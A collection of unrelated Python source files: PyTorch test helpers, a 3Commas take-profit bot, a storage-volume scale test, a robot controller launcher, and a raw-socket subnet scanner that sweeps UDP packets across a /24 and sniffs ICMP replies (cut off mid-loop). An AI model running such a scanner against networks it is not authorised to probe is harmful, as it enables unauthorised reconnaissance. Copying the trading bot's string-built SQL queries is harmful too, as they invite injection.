f(self, *args, **kwargs, coalesced=True)
f(self, *args, **kwargs, coalesced=False)
return wrapped
@contextlib.contextmanager
def disable_gc():
if gc.isenabled():
try:
gc.disable()
yield
finally:
gc.enable()
else:
yield
def find_library_location(lib_name: str) -> Path:
    # return the shared library file from the installed folder if it exists,
    # otherwise the file from the build folder
torch_root = Path(torch.__file__).resolve().parent
path = torch_root / 'lib' / lib_name
if os.path.exists(path):
return path
torch_root = Path(__file__).resolve().parent.parent.parent
return torch_root / 'build' / 'lib' / lib_name
def sandcastle_skip(reason):
"""
    Similar to unittest.skip; however, in the sandcastle environment it just
    "passes" the test instead, to avoid creating tasks complaining about tests
    skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
return wrapper
return decorator
def mock_wrapper(method):
"""
Returns a function that calls the real implementation of a method
in addition to passing args to a mock object.
"""
mock = MagicMock()
@wraps(method)
def wrapper(self, *args, **kwargs):
mock(*args, **kwargs)
return method(self, *args, **kwargs)
wrapper.mock = mock # type: ignore[attr-defined]
return wrapper
def get_tensors_from(args, kwargs):
""" Returns a set of all Tensor objects in the given args and kwargs. """
return set([arg for arg in args if isinstance(arg, Tensor)] +
[v for v in kwargs.values() if isinstance(v, Tensor)])
# Returns scalar tensor representation of a list of integer byte values
def bytes_to_scalar(byte_list: List[int], dtype: torch.dtype, device: torch.device):
dtype_to_ctype: Dict[torch.dtype, Any] = {
torch.int8: ctypes.c_int8,
torch.uint8: ctypes.c_uint8,
torch.int16: ctypes.c_int16,
torch.int32: ctypes.c_int32,
torch.int64: ctypes.c_int64,
torch.bool: ctypes.c_bool,
torch.float32: ctypes.c_float,
torch.complex64: ctypes.c_float,
torch.float64: ctypes.c_double,
torch.complex128: ctypes.c_double,
}
ctype = dtype_to_ctype[dtype]
num_bytes = ctypes.sizeof(ctype)
def check_bytes(byte_list):
for byte in byte_list:
assert 0 <= byte <= 255
if dtype.is_complex:
assert len(byte_list) == (num_bytes * 2)
check_bytes(byte_list)
real = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[:num_bytes])).value
imag = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[num_bytes:])).value
res = real + 1j * imag
else:
assert len(byte_list) == num_bytes
check_bytes(byte_list)
res = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list)).value
return torch.tensor(res, device=device, dtype=dtype)
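# A small worked example (illustrative only): on a little-endian machine the four
# bytes 0x00 0x00 0x80 0x3F are the IEEE-754 encoding of 1.0, so the call below
# returns tensor(1.) with dtype torch.float32.
def _example_bytes_to_scalar():
    return bytes_to_scalar([0x00, 0x00, 0x80, 0x3F], torch.float32, 'cpu')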
def has_breakpad():
# We always build with breakpad in CI
if IS_IN_CI:
return True
# If not on a special build, check that the library was actually linked in
try:
torch._C._get_minidump_directory() # type: ignore[attr-defined]
return True
except RuntimeError as e:
if "Minidump handler is uninintialized" in str(e):
return True
return False
def sandcastle_skip_if(condition, reason):
"""
    Similar to unittest.skipIf; however, in the sandcastle environment it just
    "passes" the test instead, to avoid creating tasks complaining about tests
    skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE and condition:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
if condition and IS_SANDCASTLE:
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
else:
return func(*args, **kwargs)
return wrapper
return decorator
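# A minimal usage sketch (illustrative only): outside sandcastle this behaves like
# unittest.skipIf; inside sandcastle the wrapped callable just prints a note and
# returns instead of registering a skipped test.
@sandcastle_skip_if(not torch.cuda.is_available(), "CUDA is not available")
def _example_cuda_only_check():
    return torch.cuda.current_device()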
def dtype_name(dtype):
""" Returns the pretty name of the dtype (e.g. torch.int64 -> int64). """
return str(dtype).split('.')[1]
def set_single_threaded_if_parallel_tbb(fn):
"""Set test to be single threaded for parallel tbb.
See https://github.com/pytorch/pytorch/issues/64571#issuecomment-914691883
"""
if not IS_TBB:
return fn
@wraps(fn)
def wrap_fn(*args, **kwargs):
num_threads = torch.get_num_threads()
torch.set_num_threads(1)
try:
return fn(*args, **kwargs)
finally:
torch.set_num_threads(num_threads)
return wrap_fn
@functools.lru_cache()
def get_cycles_per_ms() -> float:
"""Measure and return approximate number of cycles per millisecond for torch.cuda._sleep
"""
def measure() -> float:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
cycles_per_ms = 1000000 / start.elapsed_time(end)
return cycles_per_ms
# Get 10 values and remove the 2 max and 2 min and return the avg.
    # This is to avoid system disturbances that skew the results, e.g.
# the very first cuda call likely does a bunch of init, which takes
# much longer than subsequent calls.
#
# Tested on both Tesla V100, Quadro GP100, Titan RTX, RTX 3090 GPUs
# and seems to return stable values. Therefore, we enable caching
# using lru_cache decorator above.
num = 10
vals = []
for _ in range(num):
vals.append(measure())
vals = sorted(vals)
return mean(vals[2 : num - 2])
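# A minimal usage sketch (illustrative only, CUDA required when called): spin the
# GPU for roughly 50 ms by scaling the measured cycles-per-millisecond value.
def _example_gpu_spin(ms=50):
    torch.cuda._sleep(int(get_cycles_per_ms() * ms))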
|
tpincrement.py
|
#!/usr/bin/env python3
"""Cyberjunky's 3Commas bot helpers."""
import argparse
import configparser
import json
import logging
import os
import queue
import sqlite3
import sys
import threading
import time
from logging.handlers import TimedRotatingFileHandler as _TimedRotatingFileHandler
from pathlib import Path
import apprise
from py3cw.request import Py3CW
class NotificationHandler:
"""Notification class."""
def __init__(self, enabled=False, notify_urls=None):
if enabled and notify_urls:
self.apobj = apprise.Apprise()
urls = json.loads(notify_urls)
for url in urls:
self.apobj.add(url)
self.queue = queue.Queue()
self.start_worker()
self.enabled = True
else:
self.enabled = False
def start_worker(self):
"""Start notification worker."""
threading.Thread(target=self.process_queue, daemon=True).start()
def process_queue(self):
"""Process the queue."""
while True:
message, attachments = self.queue.get()
if attachments:
self.apobj.notify(body=message, attach=attachments)
else:
self.apobj.notify(body=message)
self.queue.task_done()
def send_notification(self, message, attachments=None):
"""Send a notification if enabled."""
if self.enabled:
msg = f"[3Commas bots helper {program}]\n" + message
self.queue.put((msg, attachments or []))
class TimedRotatingFileHandler(_TimedRotatingFileHandler):
"""Override original code to fix bug with not deleting old logfiles."""
def __init__(self, filename="", when="midnight", interval=1, backupCount=7):
super().__init__(
filename=filename,
when=when,
interval=int(interval),
backupCount=int(backupCount),
)
def getFilesToDelete(self):
"""Find all logfiles present."""
dirname, basename = os.path.split(self.baseFilename)
filenames = os.listdir(dirname)
result = []
prefix = basename + "."
plen = len(prefix)
for filename in filenames:
if filename[:plen] == prefix:
suffix = filename[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirname, filename))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[: len(result) - self.backupCount]
return result
def doRollover(self):
"""Delete old logfiles but keep latest backupCount amount."""
super().doRollover()
self.close()
timetuple = time.localtime(time.time())
dfn = self.baseFilename + "." + time.strftime(self.suffix, timetuple)
if os.path.exists(dfn):
os.remove(dfn)
os.rename(self.baseFilename, dfn)
if self.backupCount > 0:
for oldlog in self.getFilesToDelete():
os.remove(oldlog)
self.stream = open(self.baseFilename, "w")
currenttime = int(time.time())
newrolloverat = self.computeRollover(currenttime)
while newrolloverat <= currenttime:
newrolloverat = newrolloverat + self.interval
self.rolloverAt = newrolloverat
class Logger:
"""Logger class."""
my_logger = None
def __init__(self, notificationhandler, logstokeep, debug_enabled, notify_enabled):
"""Logger init."""
self.my_logger = logging.getLogger()
self.notify_enabled = notify_enabled
self.notificationhandler = notificationhandler
if debug_enabled:
self.my_logger.setLevel(logging.DEBUG)
self.my_logger.propagate = False
else:
self.my_logger.setLevel(logging.INFO)
self.my_logger.propagate = False
date_fmt = "%Y-%m-%d %H:%M:%S"
formatter = logging.Formatter(
"%(asctime)s - %(filename)s - %(levelname)s - %(message)s", date_fmt
)
console_formatter = logging.Formatter(
"%(asctime)s - %(filename)s - %(message)s", date_fmt
)
# Create directory if not exists
if not os.path.exists(f"{datadir}/logs"):
os.makedirs(f"{datadir}/logs")
# Log to file and rotate if needed
file_handle = TimedRotatingFileHandler(
filename=f"{datadir}/logs/{program}.log", backupCount=logstokeep
)
file_handle.setFormatter(formatter)
self.my_logger.addHandler(file_handle)
# Log to console
console_handle = logging.StreamHandler()
console_handle.setLevel(logging.INFO)
console_handle.setFormatter(console_formatter)
self.my_logger.addHandler(console_handle)
def log(self, message, level="info"):
"""Call the log levels."""
if level == "info":
self.my_logger.info(message)
elif level == "warning":
self.my_logger.warning(message)
elif level == "error":
self.my_logger.error(message)
elif level == "debug":
self.my_logger.debug(message)
def info(self, message, notify=False):
"""Info level."""
self.log(message, "info")
if self.notify_enabled and notify:
self.notificationhandler.send_notification(message)
def warning(self, message, notify=True):
"""Warning level."""
self.log(message, "warning")
if self.notify_enabled and notify:
self.notificationhandler.send_notification(message)
def error(self, message, notify=True):
"""Error level."""
self.log(message, "error")
if self.notify_enabled and notify:
self.notificationhandler.send_notification(message)
def debug(self, message, notify=False):
"""Debug level."""
self.log(message, "debug")
if self.notify_enabled and notify:
self.notificationhandler.send_notification(message)
def load_config():
"""Create default or load existing config file."""
cfg = configparser.ConfigParser()
if cfg.read(f"{datadir}/{program}.ini"):
return cfg
cfg["settings"] = {
"timezone": "Europe/Amsterdam",
"timeinterval": 3600,
"debug": False,
"logrotate": 7,
"botids": [12345, 67890],
"increment-step-scale": [0.10, 0.05, 0.05, 0.05, 0.05, 0.05],
"3c-apikey": "Your 3Commas API Key",
"3c-apisecret": "Your 3Commas API Secret",
"notifications": False,
"notify-urls": ["notify-url1"],
}
with open(f"{datadir}/{program}.ini", "w") as cfgfile:
cfg.write(cfgfile)
return None
def init_threecommas_api(cfg):
"""Init the 3commas API."""
return Py3CW(
key=cfg.get("settings", "3c-apikey"),
secret=cfg.get("settings", "3c-apisecret"),
request_options={
"request_timeout": 10,
"nr_of_retries": 3,
"retry_status_codes": [502],
},
)
def check_deal(dealid):
"""Check if deal was already logged."""
data = cursor.execute(f"SELECT * FROM deals WHERE dealid = {dealid}").fetchone()
if data is None:
return None
return data
def update_deal(thebot, deal, to_increment, new_percentage):
"""Update bot with new take profit percentage."""
bot_name = thebot["name"]
deal_id = deal["id"]
error, data = api.request(
entity="deals",
action="update_deal",
action_id=str(deal_id),
payload={
"deal_id": thebot["id"],
"take_profit": new_percentage,
},
)
if data:
logger.info(
f"Incremented TP for deal {deal_id}/{deal['pair']} and bot \"{bot_name}\"\n"
f"Changed TP from {deal['take_profit']}% to {new_percentage}% (+{to_increment}%)",
True,
)
else:
logger.error(
"Error occurred updating bot with new take profit values: %s" % error["msg"]
)
def increment_deals(thebot):
"""Check deals from bot and compare SO agains the database."""
deals_count = 0
deals = thebot["active_deals"]
    logger.debug(thebot)
if deals:
for deal in deals:
deal_id = deal["id"]
completed_safety_orders_count = int(deal["completed_safety_orders_count"])
to_increment = 0
deals_count += 1
existing_deal = check_deal(deal_id)
if existing_deal is not None:
db.execute(
f"UPDATE deals SET safety_count = {completed_safety_orders_count} "
f"WHERE dealid = {deal_id}"
)
else:
db.execute(
f"INSERT INTO deals (dealid, safety_count) VALUES ({deal_id}, "
f"{completed_safety_orders_count})"
)
existing_deal_safety_count = (
0 if existing_deal is None else existing_deal["safety_count"]
)
for cnt in range(
existing_deal_safety_count + 1, completed_safety_orders_count + 1
):
try:
to_increment += float(increment_step_scale[cnt - 1])
except IndexError:
pass
if to_increment != 0.0:
new_percentage = round(float(deal["take_profit"]) + to_increment, 2)
update_deal(thebot, deal, round(to_increment, 2), new_percentage)
logger.info(
f"Finished updating {deals_count} deals for bot \"{thebot['name']}\""
)
db.commit()
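# A minimal sketch (illustrative only, not called anywhere) of the increment
# computation used in increment_deals() above: every newly completed safety order
# adds the matching entry of increment-step-scale to the take-profit percentage.
def _example_compute_tp_increment(step_scale, old_so_count, new_so_count):
    """E.g. step_scale=[0.10, 0.05, 0.05], old=1, new=3 adds 0.05 + 0.05 = 0.10."""
    to_increment = 0.0
    for cnt in range(old_so_count + 1, new_so_count + 1):
        try:
            to_increment += float(step_scale[cnt - 1])
        except IndexError:
            pass
    return round(to_increment, 2)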
def init_tpincrement_db():
"""Create or open database to store bot and deals data."""
try:
dbname = f"{program}.sqlite3"
dbpath = f"file:{datadir}/{dbname}?mode=rw"
dbconnection = sqlite3.connect(dbpath, uri=True)
dbconnection.row_factory = sqlite3.Row
logger.info(f"Database '{datadir}/{dbname}' opened successfully")
except sqlite3.OperationalError:
dbconnection = sqlite3.connect(f"{datadir}/{dbname}")
dbconnection.row_factory = sqlite3.Row
dbcursor = dbconnection.cursor()
logger.info(f"Database '{datadir}/{dbname}' created successfully")
dbcursor.execute(
"CREATE TABLE deals (dealid INT Primary Key, safety_count INT)"
)
logger.info("Database tables created successfully")
return dbconnection
def upgrade_tpincrement_db():
"""Upgrade database if needed."""
try:
cursor.execute("ALTER TABLE deals DROP COLUMN increment")
logger.info("Database schema upgraded")
except sqlite3.OperationalError:
logger.debug("Database schema is up-to-date")
def upgrade_config(cfg):
"""Upgrade config file if needed."""
try:
cfg.get("settings", "increment-step-scale")
except configparser.NoOptionError:
cfg.set(
"settings", "increment-step-scale", "[0.10, 0.05, 0.05, 0.05, 0.05, 0.05]"
)
cfg.remove_option("settings", "increment-percentage")
with open(f"{datadir}/{program}.ini", "w+") as cfgfile:
cfg.write(cfgfile)
return cfg
# Start application
program = Path(__file__).stem
# Parse and interpret options.
parser = argparse.ArgumentParser(description="Cyberjunky's 3Commas bot helper.")
parser.add_argument("-d", "--datadir", help="data directory to use", type=str)
args = parser.parse_args()
if args.datadir:
datadir = args.datadir
else:
datadir = os.getcwd()
# Create or load configuration file
config = load_config()
if not config:
logger = Logger(None, 7, False, False)
logger.info(f"3Commas bot helper {program}")
logger.info("Started at %s." % time.strftime("%A %H:%M:%S %d-%m-%Y"))
logger.info(
f"Created example config file '{datadir}/{program}.ini', edit it and restart the program."
)
sys.exit(0)
else:
# Upgrade config file if needed
config = upgrade_config(config)
# Handle timezone
if hasattr(time, "tzset"):
os.environ["TZ"] = config.get(
"settings", "timezone", fallback="Europe/Amsterdam"
)
time.tzset()
# Init notification handler
notification = NotificationHandler(
config.getboolean("settings", "notifications"),
config.get("settings", "notify-urls"),
)
# Init logging
logger = Logger(
notification,
int(config.get("settings", "logrotate", fallback=7)),
config.getboolean("settings", "debug"),
config.getboolean("settings", "notifications"),
)
logger.info(f"3Commas bot helper {program}")
logger.info("Started at %s" % time.strftime("%A %H:%M:%S %d-%m-%Y"))
logger.info(f"Loaded configuration from '{datadir}/{program}.ini'")
if notification.enabled:
logger.info("Notifications are enabled")
else:
logger.info("Notifications are disabled")
# Initialize 3Commas API
api = init_threecommas_api(config)
# Initialize or open database
db = init_tpincrement_db()
cursor = db.cursor()
# Upgrade database if needed
upgrade_tpincrement_db()
# Auto increment TP %
while True:
config = load_config()
logger.info(f"Reloaded configuration from '{datadir}/{program}.ini'")
# User settings
botids = json.loads(config.get("settings", "botids"))
timeint = int(config.get("settings", "timeinterval"))
increment_step_scale = json.loads(config.get("settings", "increment-step-scale"))
# Walk through all bots specified
for bot in botids:
boterror, botdata = api.request(
entity="bots",
action="show",
action_id=str(bot),
)
if botdata:
increment_deals(botdata)
else:
logger.error("Error occurred incrementing deals: %s" % boterror["msg"])
if timeint > 0:
localtime = time.time()
nexttime = localtime + int(timeint)
timeresult = time.strftime("%H:%M:%S", time.localtime(nexttime))
logger.info("Next update in %s Seconds at %s" % (timeint, timeresult), True)
time.sleep(timeint)
else:
break
|
test_pvc_creation_deletion_scale.py
|
"""
Test to measure pvc scale creation & deletion time. Total pvc count would be 1500
"""
import logging
import csv
import random
import pytest
import threading
from tests import helpers
from ocs_ci.framework.testlib import scale, E2ETest, polarion_id
from ocs_ci.ocs import constants
from ocs_ci.utility.utils import ocsci_log_path
log = logging.getLogger(__name__)
@scale
class TestPVCCreationDeletionScale(E2ETest):
"""
Base class for PVC scale creation and deletion
"""
@pytest.fixture()
def namespace(self, project_factory):
"""
Create a new project
"""
proj_obj = project_factory()
self.namespace = proj_obj.namespace
@pytest.mark.parametrize(
argnames=["access_mode", "interface"],
argvalues=[
pytest.param(
*[constants.ACCESS_MODE_RWO, constants.CEPHBLOCKPOOL],
marks=pytest.mark.polarion_id("OCS-1225")
),
pytest.param(
*[constants.ACCESS_MODE_RWX, constants.CEPHBLOCKPOOL],
marks=pytest.mark.polarion_id("OCS-2010")
),
pytest.param(
*[constants.ACCESS_MODE_RWX, constants.CEPHFS_INTERFACE],
marks=pytest.mark.polarion_id("OCS-2008")
),
]
)
@pytest.mark.usefixtures(namespace.__name__)
def test_multiple_pvc_creation_deletion_scale(self, namespace, access_mode, interface):
"""
Measuring PVC creation time while scaling PVC
Measure PVC deletion time after creation test
"""
number_of_pvc = 1500
log.info(f"Start creating {access_mode}-{interface} {number_of_pvc} PVC")
if interface == constants.CEPHBLOCKPOOL:
self.sc_obj = constants.DEFAULT_STORAGECLASS_RBD
elif interface == constants.CEPHFS_INTERFACE:
self.sc_obj = constants.DEFAULT_STORAGECLASS_CEPHFS
# Create PVC
pvc_objs = helpers.create_multiple_pvcs(
sc_name=self.sc_obj,
namespace=self.namespace,
number_of_pvc=number_of_pvc,
size=f"{random.randrange(5, 105, 5)}Gi",
access_mode=access_mode
)
# Check for PVC status using threads
threads = list()
for obj in pvc_objs:
process = threading.Thread(
target=helpers.wait_for_resource_state,
args=(obj, constants.STATUS_BOUND, )
)
process.start()
threads.append(process)
for process in threads:
process.join()
# Get pvc_name, require pvc_name to fetch creation time data from log
threads = list()
for pvc_obj in pvc_objs:
process = threading.Thread(target=pvc_obj.reload)
process.start()
threads.append(process)
for process in threads:
process.join()
pvc_name_list, pv_name_list = ([] for i in range(2))
threads = list()
for pvc_obj in pvc_objs:
            process1 = threading.Thread(target=pvc_name_list.append, args=(pvc_obj.name,))
            process2 = threading.Thread(target=pv_name_list.append, args=(pvc_obj.backed_pv,))
process1.start()
process2.start()
threads.append(process1)
threads.append(process2)
for process in threads:
process.join()
# Get PVC creation time
pvc_create_time = helpers.measure_pvc_creation_time_bulk(
interface=interface, pvc_name_list=pvc_name_list
)
# TODO: Update below code with google API, to record value in spreadsheet
# TODO: For now observing Google API limit to write more than 100 writes
log_path = f"{ocsci_log_path()}/{self.sc_obj}-{access_mode}"
with open(f"{log_path}-creation-time.csv", "w") as fd:
csv_obj = csv.writer(fd)
for k, v in pvc_create_time.items():
csv_obj.writerow([k, v])
logging.info(
f"Create data present in {log_path}-creation-time.csv file"
)
# Delete PVC
for obj in pvc_objs:
obj.delete()
obj.ocp.wait_for_delete(obj.name)
# Get PVC deletion time
pvc_deletion_time = helpers.measure_pv_deletion_time_bulk(
interface=interface, pv_name_list=pv_name_list
)
# Update result to csv file.
# TODO: Update below code with google API, to record value in spreadsheet
# TODO: For now observing Google API limit to write more than 100 writes
with open(f"{log_path}-deletion-time.csv", "w") as fd:
csv_obj = csv.writer(fd)
for k, v in pvc_deletion_time.items():
csv_obj.writerow([k, v])
logging.info(
f"Delete data present in {log_path}-deletion-time.csv file"
)
@polarion_id('OCS-1885')
@pytest.mark.usefixtures(namespace.__name__)
def test_all_4_type_pvc_creation_deletion_scale(self, namespace):
"""
        Measure PVC creation time while scaling PVCs of all 4 types. A total of 1500 PVCs
        will be created, i.e. 375 of each PVC type.
Measure PVC deletion time in scale env
"""
number_of_pvc = 375
log.info(f"Start creating {number_of_pvc} PVC of all 4 types")
cephfs_sc_obj = constants.DEFAULT_STORAGECLASS_CEPHFS
rbd_sc_obj = constants.DEFAULT_STORAGECLASS_RBD
# Create all 4 types of PVC
fs_pvc_obj, rbd_pvc_obj = ([] for i in range(2))
for mode in [constants.ACCESS_MODE_RWO, constants.ACCESS_MODE_RWX]:
fs_pvc_obj.extend(helpers.create_multiple_pvcs(
sc_name=cephfs_sc_obj, namespace=self.namespace, number_of_pvc=number_of_pvc,
size=f"{random.randrange(5, 105, 5)}Gi", access_mode=mode)
)
rbd_pvc_obj.extend(helpers.create_multiple_pvcs(
sc_name=rbd_sc_obj, namespace=self.namespace, number_of_pvc=number_of_pvc,
size=f"{random.randrange(5, 105, 5)}Gi", access_mode=mode)
)
# Check for PVC status using threads
threads = list()
for obj in fs_pvc_obj:
process = threading.Thread(
target=helpers.wait_for_resource_state,
args=(obj, constants.STATUS_BOUND, )
)
process.start()
threads.append(process)
for obj in rbd_pvc_obj:
process = threading.Thread(
target=helpers.wait_for_resource_state,
args=(obj, constants.STATUS_BOUND,)
)
process.start()
threads.append(process)
for process in threads:
process.join()
# Get pvc_name, require pvc_name to fetch creation time data from log
threads = list()
for fs_obj, rbd_obj in zip(fs_pvc_obj, rbd_pvc_obj):
process1 = threading.Thread(target=fs_obj.reload)
process2 = threading.Thread(target=rbd_obj.reload)
process1.start()
process2.start()
threads.append(process1)
threads.append(process2)
for process in threads:
process.join()
fs_pvc_name, rbd_pvc_name = ([] for i in range(2))
fs_pv_name, rbd_pv_name = ([] for i in range(2))
threads = list()
for fs_obj, rbd_obj in zip(fs_pvc_obj, rbd_pvc_obj):
            process1 = threading.Thread(target=fs_pvc_name.append, args=(fs_obj.name,))
            process2 = threading.Thread(target=rbd_pvc_name.append, args=(rbd_obj.name,))
            process3 = threading.Thread(target=fs_pv_name.append, args=(fs_obj.backed_pv,))
            process4 = threading.Thread(target=rbd_pv_name.append, args=(rbd_obj.backed_pv,))
process1.start()
process2.start()
process3.start()
process4.start()
threads.append(process1)
threads.append(process2)
threads.append(process3)
threads.append(process4)
for process in threads:
process.join()
# Get PVC creation time
fs_pvc_create_time = helpers.measure_pvc_creation_time_bulk(
interface=constants.CEPHFS_INTERFACE, pvc_name_list=fs_pvc_name
)
rbd_pvc_create_time = helpers.measure_pvc_creation_time_bulk(
interface=constants.CEPHBLOCKPOOL, pvc_name_list=rbd_pvc_name
)
fs_pvc_create_time.update(rbd_pvc_create_time)
# TODO: Update below code with google API, to record value in spreadsheet
# TODO: For now observing Google API limit to write more than 100 writes
log_path = f"{ocsci_log_path()}/All-type-PVC"
with open(f"{log_path}-creation-time.csv", "w") as fd:
csv_obj = csv.writer(fd)
for k, v in fs_pvc_create_time.items():
csv_obj.writerow([k, v])
logging.info(
f"Create data present in {log_path}-creation-time.csv file"
)
# Delete PVC
pvc_objs = fs_pvc_obj + rbd_pvc_obj
for obj in pvc_objs:
obj.delete()
obj.ocp.wait_for_delete(obj.name)
# Get PVC deletion time
        fs_pvc_deletion_time = helpers.measure_pv_deletion_time_bulk(
interface=constants.CEPHFS_INTERFACE, pv_name_list=fs_pv_name
)
rbd_pvc_deletion_time = helpers.measure_pv_deletion_time_bulk(
interface=constants.CEPHBLOCKPOOL, pv_name_list=rbd_pv_name
)
fs_pvc_deletion_time.update(rbd_pvc_deletion_time)
# TODO: Update below code with google API, to record value in spreadsheet
# TODO: For now observing Google API limit to write more than 100 writes
with open(f"{log_path}-deletion-time.csv", "w") as fd:
csv_obj = csv.writer(fd)
for k, v in fs_pvc_deletion_time.items():
csv_obj.writerow([k, v])
logging.info(
f"Delete data present in {log_path}-deletion-time.csv file"
)
|
main.py
|
#!/usr/bin/env python3
import sys, os, signal
from spotmicro.utilities.log import Logger
from spotmicro.utilities.config import Config
import multiprocessing
from multiprocessing.managers import BaseManager
from queue import LifoQueue
from spotmicro.motion_controller.motion_controller import MotionController
from spotmicro.abort_controller.abort_controller import AbortController
from spotmicro.lcd_screen_controller.lcd_screen_controller import LCDScreenController
from spotmicro.remote_controller.remote_controller import RemoteControllerController
log = Logger().setup_logger()
def process_abort_controller(communication_queues):
abort = AbortController(communication_queues)
abort.do_process_events_from_queue()
def process_motion_controller(communication_queues):
motion = MotionController(communication_queues)
motion.do_process_events_from_queues()
def process_remote_controller_controller(communication_queues):
remote_controller = RemoteControllerController(communication_queues)
remote_controller.do_process_events_from_queues()
# Optional
def process_output_lcd_screen_controller(communication_queues):
lcd_screen = LCDScreenController(communication_queues)
lcd_screen.do_process_events_from_queue()
# create manager that knows how to create and manage LifoQueues
# class MyManager(BaseManager):
# pass
def create_controllers_queues():
# https://docs.python.org/3/library/queue.html
    # We use queues for inter-process communication because of their simplicity.
    # Why multiple queues? Because we limit the number of messages on each one, and
    # some sensors read and update them at very high frequency while others don't. A single shared
    # queue would let the high-frequency controllers wipe out the messages of the slower ones.
    # The get and put methods handle the locks via the optional parameter block=True.
    # Queue sizes should stay around 10; the controllers will flood them with orders, so we use
    # .get(block=True) and read only as fast as we can process.
# MyManager.register('LifoQueue', LifoQueue)
# manager = MyManager()
# manager.start()
communication_queues = {'abort_controller': multiprocessing.Queue(10),
# 'motion_controller': manager.LifoQueue(),
'motion_controller': multiprocessing.Queue(1),
'lcd_screen_controller': multiprocessing.Queue(10)}
log.info('Created the communication queues: ' + ', '.join(communication_queues.keys()))
return communication_queues
def close_controllers_queues(communication_queues):
log.info('Closing controller queues')
    for queue in communication_queues.values():
queue.close()
queue.join_thread()
def main():
communication_queues = create_controllers_queues()
# Start the abort controller
# 0E port from PCA9685 must be HIGH
abort_controller = multiprocessing.Process(target=process_abort_controller, args=(communication_queues,))
    abort_controller.daemon = True  # A daemon process keeps running only while the main process is executing;
    # it terminates after finishing its work or when the main program is killed.
# Start the motion controller
# Process/Thread, listening the events QUEUE for orders
motion_controller = multiprocessing.Process(target=process_motion_controller, args=(communication_queues,))
    motion_controller.daemon = True  # A daemon process keeps running only while the main process is executing;
    # it terminates after finishing its work or when the main program is killed.
# Activate Bluetooth controller
# Capture the buttons from the controller and generate events for the QUEUE
remote_controller_controller = multiprocessing.Process(target=process_remote_controller_controller,
args=(communication_queues,))
remote_controller_controller.daemon = True
# Activate Screen
# Show communication on it about the status
lcd_screen_controller = multiprocessing.Process(target=process_output_lcd_screen_controller,
args=(communication_queues,))
lcd_screen_controller.daemon = True
# Start the threads queue processing
abort_controller.start()
motion_controller.start()
remote_controller_controller.start()
lcd_screen_controller.start()
if not abort_controller.is_alive():
log.error("SpotMicro can't work without abort_controller")
sys.exit(1)
if not motion_controller.is_alive():
log.error("SpotMicro can't work without motion_controller")
sys.exit(1)
    if not remote_controller_controller.is_alive():
log.error("SpotMicro can't work without remote_controller_controller")
sys.exit(1)
# make sure the thread/process ends
abort_controller.join()
motion_controller.join()
remote_controller_controller.join()
lcd_screen_controller.join()
close_controllers_queues(communication_queues)
if __name__ == '__main__':
log.info('SpotMicro starting...')
try:
main()
# except Exception as e:
# log.error('Terminated due error')
except KeyboardInterrupt:
log.info('Terminated due Control+C was pressed')
else:
log.info('Normal termination')
|
scanner.py
|
# coding=utf-8
"""
Sniffer built on top of sniffer_with_icmp.
Prerequisite: pip install netaddr (or easy_install netaddr)
"""
import os
import socket
import struct
import threading
from ctypes import *
from netaddr import IPNetwork, IPAddress
def udp_sender(subnet, magic_message):
"""
    Send UDP datagrams to every host in the target subnet
:param subnet:
:param magic_message:
:return:
"""
sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for ip in IPNetwork(subnet):
try:
sender.sendto(magic_message, ("%s" % ip, 65212))
except:
pass
class IP(Structure):
"""
    IP header structure definition, ported from the C struct
"""
_fields_ = [
("ihl", c_ubyte, 4),
("version", c_ubyte, 4),
("tos", c_ubyte),
("len", c_ushort),
("id", c_ushort),
("offset", c_ushort),
("ttl", c_ubyte),
("protocol_num", c_ubyte),
("sum", c_ushort),
# 32bit
# ("src", c_ulong),
# ("dst", c_ulong),
# 64bit
("src", c_uint32),
("dst", c_uint32)
]
def __new__(self, socket_buffer=None):
return self.from_buffer_copy(socket_buffer)
def __init__(self, socket_buffer=None):
        # Map protocol numbers to protocol names
        self.protocol_map = {1: "ICMP", 6: "TCP", 17: "UDP"}
        # Format the IP addresses (32-bit)
        # self.src_address = socket.inet_ntoa(struct.pack("<L", self.src))
        # self.dst_address = socket.inet_ntoa(struct.pack("<L", self.dst))
        # Format the IP addresses (64-bit)
        self.src_address = socket.inet_ntoa(struct.pack("@I", self.src))
        self.dst_address = socket.inet_ntoa(struct.pack("@I", self.dst))
        # Resolve the human-readable protocol type
try:
self.protocol = self.protocol_map[self.protocol_num]
except:
self.protocol = str(self.protocol_num)
class ICMP(Structure):
_fields_ = [
("type", c_ubyte),
("code", c_ubyte),
("checksum", c_ushort),
("unused", c_ushort),
("next_hop_mtu", c_ushort)
]
def __new__(self, socket_buffer):
return self.from_buffer_copy(socket_buffer)
def __init__(self, socket_buffer):
pass
def driver():
    # Host to listen on
    host = "192.168.1.102"
    # Target subnet to scan
    subnet = "192.168.1.0/24"
    # Custom string that will be checked for in the ICMP responses
    magic_message = "PYTHONRULES!"
    # Create a raw socket and bind it to the public interface
if os.name == "nt":
socket_protocol = socket.IPPROTO_IP
else:
socket_protocol = socket.IPPROTO_ICMP
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
sniffer.bind((host, 0))
    # Include the IPv4 header in the captured packets
    sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    # Enable promiscuous mode on Windows
    if os.name == "nt":
        sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
    # Start sending packets
t = threading.Thread(target=udp_sender, args=(subnet, magic_message))
t.start()
try:
while True:
            # Read a packet
            raw_buffer = sniffer.recvfrom(65565)[0]
            # Parse the first 20 bytes of the buffer as an IP header (32-bit)
            # ip_header = IP(raw_buffer[0:20])
